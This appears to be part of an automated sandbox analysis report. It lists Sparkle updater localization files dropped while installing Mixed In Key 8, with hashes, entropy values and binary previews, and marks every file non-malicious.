Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$....2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$..+.,./.2.5.>.?.G.K.L.U.V.].^.b.w.{...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.\|.....r.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_HCZFdS Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18619
Entropy (8bit):	6.769075849014705
Encrypted:	false
SSDEEP:	384:ZgVpE0DeEYNg7uH4+53NAKAsif1788g71lTbP8YU/8oWuSgBYLOr:ZgVDeEYyZKAdRulf4/8oBByOr
MD5:	B72919A225060C23A6F1FD9BC53099F6
SHA1:	E896D6FB46DB8E785D75484068C92FBC9F4E6400
SHA-256:	80DA82AC2B9E1C09BEFD5A1D9B9275D11EE9403B546BABBF7A2B8CD7F045189E
SHA-512:	610ECC1A28A215ED5DF46DF0C4EFCB0E5F7CC8B97C495F27D619B06C37E7580106C07A7FC9D847C583FBECB7A32D6C3AEC148189962AE87D649533D5EEE39EEC
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_SztlBh Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	7008
Entropy (8bit):	3.4124477771837975
Encrypted:	false
SSDEEP:	96:M4mgXDt+/rX3OXighLVh7U7NA207b7VmKtOzjmn3A6SR55kn5oFQ4dTOLM27PFs:Mpj3OXZhjM1jmnQ/SyQ42LFs
MD5:	7769F661B7648C104BF5877FE261CCBA
SHA1:	1AB35C5B316336ECB7681258EC81BC38BF419C43
SHA-256:	0065DAD391159B78A4E09D2D25E1E220B62AAF8DB6D217FB5339E5D4F722E93B
SHA-512:	8A7BCD2DB241455AA1D13AE26F898448A4641DC1659019099B1EA6306F5F8F20B29E4C252BB75869740F4FAC1C252E246F843B1698318D4FA6EE3C53FE3813CF
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .s.e. .h.a.n. .d.e.s.c.a.r.g.a.d.o. .y. .e.s.t...n. .l.i.s.t.o.s. .p.a.r.a. .u.t.i.l.i.z.a.r... ...L.e. .g.u.s.t.a.r...a. .i.n.s.t.a.l.a.r. .e. .i.n.i.c.i.a.r. .%.1.$.@. .a.h.o.r.a.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .n.o. .s.e. .p.u.e.d.e. .a.c.t.u.a.l.i.z.a.r. .c.u.a.n.d.o. .s.e. .e.j.e.c.u.t.a. .d.e.s.d.e. .u.n. .v.o.l.u.m.e.n. .d.e. .s...l.o. .l.e.c.t.u.r.a. .c.o.m.o. .i.m.a.g.e.n. .d.e. .d.i.s.c.o. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_k3ZWYs Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15724
Entropy (8bit):	6.771316141158126
Encrypted:	false
SSDEEP:	384:dgTfE0NeEYNg7ns2OFLcJtSypg31wUvyzqlesiv:dgTveEYyDSLcJg3ba+Isiv
MD5:	F33C7B6285272192D53B71C3A7DDA823
SHA1:	4F8E24AAA157D0B11E95A6619287FFFEA19B8F41
SHA-256:	0296BE87B80B31F3CF3E78D862EA2D745B98F66997E5A749E8D517E0DAA5D85E
SHA-512:	9B7A52DA1001150B5F2069D1D106873DAB731E10FD728F2FD7CB72FB2053F4459A80A3B553928F87027B1521C2176F6EE32994F7CE22248F8B84C98A93196AF7
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_lKsfnj Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12152
Entropy (8bit):	6.728197121245614
Encrypted:	false
SSDEEP:	192:zK1WxXLQOLWjE0lTjeEYNMtKwC/4Ix6vETCs7sK5wNCZ/scX/cAQZPev:zKgxXLQwWjE0NeEYNg7C/4IxkEWWsfYx
MD5:	D70DD1994B4C17387DED7C6EB4449CBC
SHA1:	49BFEFD5FE0253D3B6BC40CD2EA964F1163C811B
SHA-256:	71B0E2F84889E68142859CB3346D765A1D43A7ED48037998DBA149939D0B71E5
SHA-512:	50744103044ACD19401F9A4F2D64ED55C0410C887FECA7557BDFBF4A223DF95812B5D743243122FF4D4BC1E0A8CEAA16B5C7A9BFF6289DC93BD1824AF8D80733
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_5Lz2oT Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12176
Entropy (8bit):	6.722479289585943
Encrypted:	false
SSDEEP:	192:zK1WxX/QOLyjE0lTjeEYNMtKwC/4I1/3Cs7sK5wNCZ/scX/cAQZPkg3Mlj:zKgxX/QwyjE0NeEYNg7C/4I1/SWsfYXl
MD5:	A7A6FA570EF2911C750A1FDD8B5B8271
SHA1:	7EA1590D965C26BB086C447BD2FF9177B1BA417E
SHA-256:	BD54E397C27A31324B5F456B4FDDBEF1146EB536C41E8F6BCE5A18C42E4550F5
SHA-512:	1376E6FB11D7FAD1CAD473AD9C022E3039DF4D6EEA7860A07229B3478C2A794F18FED7B146D5A66F9DE600D09434E50C61245D2B665A227C0602FD9941FD45EA
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_Bnswmo Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15875
Entropy (8bit):	6.793393959352986
Encrypted:	false
SSDEEP:	384:yyggfE0NeEYNg7ns2OFTWJtjGDTOdxLVU/FVsexG90pGoo:jggveEYyDSTWJlGYMFVsexGJoo
MD5:	26E2AC6528980057A0D18C40C9FF9B09
SHA1:	B4D2398A1878F46400D7E770721365CFAA168B76
SHA-256:	B81F0D913793C8BA8CDCDB2328658F07A88DC05B05C39EC590B17C99709B6CC3
SHA-512:	E2F202941D0B037A118BFEE087715414EB9ADC42C8CBC59394FC17303E3328E2127B6735154BE80E77CE17E8FC2929AC07E0CD5FC1604ACD87EF6F5D7A0AD228
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$....2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$..+.,./.2.5.>.?.G.K.L.U.V.].^.b.w.{...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.\|.....r.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_cALxpv Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	7256
Entropy (8bit):	3.4114435509507874
Encrypted:	false
SSDEEP:	96:M4tt+YGM3GlXieyhM7+/X7+/m7+/A7+/wmjpdnF5UZfDoEVuLLM27jh:MxM3GlXNyWYVfmHnF5AHa42Ph
MD5:	24B114811E9088232A4DF847DD29CA1E
SHA1:	E73F1544C42834BC00CB307D332F289814E42990
SHA-256:	F4840DD7634537D348A9774C837E9608546B99700B55B709E95DEDBA009879FD
SHA-512:	1C7A5B3C32D549D2E2BE4544955157BC7F5DE620C29B7C59CDDC78F390367A41A06E22BB6D9ED294665E8A17FF124A972BD518EA79519F41E69D7FF2F021A9AB
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .a. ...t... .t...l...c.h.a.r.g..... .V.o.u.l.e.z.-.v.o.u.s. .l.. i.n.s.t.a.l.l.e.r. .e.t. .r.e.l.a.n.c.e.r. .%.1.$.@. .m.a.i.n.t.e.n.a.n.t...?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .n.e. .p.e.u.t. .p.a.s. ...t.r.e. .m.i.s. ... .j.o.u.r. .q.u.a.n.d. .i.l. .f.o.n.c.t.i.o.n.n.e. ... .p.a.r.t.i.r. .d.. u.n. .v.o.l.u.m.e. .e.n. .l.e.c.t.u.r.e. .s.e.u.l.e.,. .c.o.m.m.e. .u.n.e. .i.m.a.g.e. .d.i.s.q.u.e. .o.u. .u.n.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_nKHZvS Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18605
Entropy (8bit):	6.772539776074263
Encrypted:	false
SSDEEP:	384:Zg2pE0DeEYNg7uH4+53NAKAsif17nL8W711l+bP8YU/8oWuSgB45r7BU:Zg2DeEYyZKAdRpl04/8oBBwNU
MD5:	905B4788B43512FCA30868869BDA16B1
SHA1:	C317D2840C0B660869170D0FC16A6C115418F470
SHA-256:	51D8190829FC0B8A8A988185C069B159C257B73830088E7D86C5E3C35DAC3604
SHA-512:	8AD5AA6AE10DB2D6596B75549F4D264FFE16B38F05B91F19CB9E8EE0949B071C5048087EEDA28537DE813C1EDC584D6545045010ACA6803AA91A11759FD86937
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_Nv7mjP Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	3.445063830625109
Encrypted:	false
SSDEEP:	96:Pa+ORD3IJSEi5czZDF4JfuVJtcTpUma1KUmatNma9yHALwM1vKvfMdHMNw956xqu:PyD3IsEBzZDF4UVzoqpfhNRygLb18ekF
MD5:	38CD8E647C2A853B14765A6BF8B11854
SHA1:	774B05146AB0F627CC9AFAE71E1220BDECCB75F1
SHA-256:	57E1840E60D70F6B41F353F33CA57FCC671C49712EB7061E0EA92B69D2ECD075
SHA-512:	66B05DCA6AC9F95E77D56CD5051B9FC0F9969283F63977FB46A840140D9FB779176DB259B66ED65B957DD0433CD1AE09657DD8C432F52FCB469C5EC17ED879EC
Malicious:	false
Preview:	..".%.@. .o.f. .%.@.". .=. .".%.@. .a.f. .%.@.".;.....".%.@. .%.@. .h.a.s. .b.e.e.n. .i.n.s.t.a.l.l.e.d. .a.n.d. .w.i.l.l. .b.e. .r.e.a.d.y. .t.o. .u.s.e. .n.e.x.t. .t.i.m.e. .%.@. .s.t.a.r.t.s.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .r.e.l.a.u.n.c.h. .n.o.w.?.". .=. .".%.@. .%.@. .h.e.f.u.r. .v.e.r.i... .s.e.t.t. .i.n.n. .o.g. .v.e.r...u.r. .t.i.l.t...k.t. .v.i... .n...s.t.u. .r...s.i.n.g.u. .%.@... .V.i.l.t.u. .e.n.d.u.r.r...s.a. .n...n.a.?.".;.....".%.@. .%.@. .i.s. .c.u.r.r.e.n.t.l.y. .t.h.e. .n.e.w.e.s.t. .v.e.r.s.i.o.n. .a.v.a.i.l.a.b.l.e...". .=. .".%.@. .%.@. .e.r. .n...j.a.s.t.a. ...t.g...f.a.n. .s.e.m. .e.r. .f...a.n.l.e.g. ...e.s.s.a. .s.t.u.n.d.i.n.a...".;.....".%.@. .%.@. .i.s. .n.o.w. .a.v.a.i.l.a.b.l.e.-.-.y.o.u. .h.a.v.e. .%.@... .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .d.o.w.n.l.o.a.d. .i.t. .n.o.w.?.". .=. ."...t.g.a.f.a. .%.2.$.@. .a.f. .%.1.$.@. .e.r. .n... .f...a.n.l.e.g.t. .e.n. ..... .e.r.t. .m.e... .%.3.$.@... .V.i.l.t.u. .s...k.j.a. .h.a.n.a. .n...n.a.?.".;.....".%.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_S6leuI Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15507
Entropy (8bit):	6.795330655052782
Encrypted:	false
SSDEEP:	384:RkgPpE0DeEYNg7uH4+UC3MJtDyvUp+i1B2HONVWHeN/IR8s8:RkgPDeEYyhC3MJ14KBBW+NIRV8
MD5:	A32C7152CE2D7604F2C7E549DB3CCB0D
SHA1:	03AF2B5C3AF48A17B45A1F45D8BFE666C187EFE2
SHA-256:	8BBBC7A45C803F3B9ED59B0F5222A5F3A57808EB8AF9C779A28F602BE3E85E4C
SHA-512:	7796DBD148883362309CFD7844464A13077F88E0D74BCF67EB22470A82E9498C264EA515965C28DDC92020F3E9ADF9AE6F5BDD69B962AFA80555F26D02DC74D3
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.\|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].b.f.j.m.n.s................................................................... .#.$.,.-...:.=.>.F.G.H.].a.e.f.h.i.j.p.u.v.{.........................................................................................................'.(.)./.6.7.8.?.@.A.[.^._.a.{...X._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys................. ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.8.9.:.;.<.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_TBZcw8 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12166
Entropy (8bit):	6.7263421646850095
Encrypted:	false
SSDEEP:	192:zK1WxXKQOLfjE0lTjeEYNMtKwC/4IEoUW9aCs7sK5wNCZ/scX/cAQZPEoP5:zKgxXKQwfjE0NeEYNg7C/4IEoUW9BWsL
MD5:	1982B7E31804EF31C8C2F331F76B9E28
SHA1:	C176FC753B45AAEF64A8406B086DFE8CC633B907
SHA-256:	89E276242430E37CC94D24FD7E06A5D5AF4DF55718D8BCB57695B02A20A08476
SHA-512:	C0B0EE847A9F6B29B390BA0EACB31C7FF1E2C8A27E3F94C689D3188EE142E0679EB029B0FF8736B20D89BC904E825A0FBE30501735632B4B0A9AE69110A389B2
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_kdxtkS Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18529
Entropy (8bit):	6.791448998770888
Encrypted:	false
SSDEEP:	384:ZgZpE0DeEYNg7uH4+53NAKAswd173dmMHU1g1lflbP8YU/8oWuSgB4nAnxW:ZgZDeEYyZKAJR3d9XlfZ4/8oBBaAnxW
MD5:	D7D8589AD88DD880A3A7A8818468AE17
SHA1:	DE1308755717FFEDB57498BE54A640EA1B9C2DFE
SHA-256:	4FE5CC29BF48D777DF97CD819E6318B573A5A487D46DA540242E7F497D575F59
SHA-512:	949D799636391C6205C12B4556A4000B75394165769F2D09BE2AC8D7668E98ED0DD005266264A85D327F1B670BAE100517A903499A9F657D236F9BDD606CA1A6
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_GeuUSc Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	7188
Entropy (8bit):	3.398526932639579
Encrypted:	false
SSDEEP:	96:M45OdOt+2dnte3KiXiLayxIOn4OcxOWm94zXnfgXFtP06X8vNjUY4o0LM27Ly:Mr+G35XjQ2nfSflyc42K
MD5:	BD82A5C8E76EF154BD73D5DA2982B981
SHA1:	1E87511F6C0DF7CED688BA9FA3D62445C11AD403
SHA-256:	0BC0892A613808E134E57CAE0FBC42A42634D3855F05E12A4C0516E27CA90902
SHA-512:	0C7371F9D1A819507E35FF18B8751168C6C7BCC0A07B4D64EBF579D949328CF17DFB254343AFAB149198621E0BC90A23D8F6C6DAB3D5E3EC7F3F3978E59FBF13
Malicious:	false
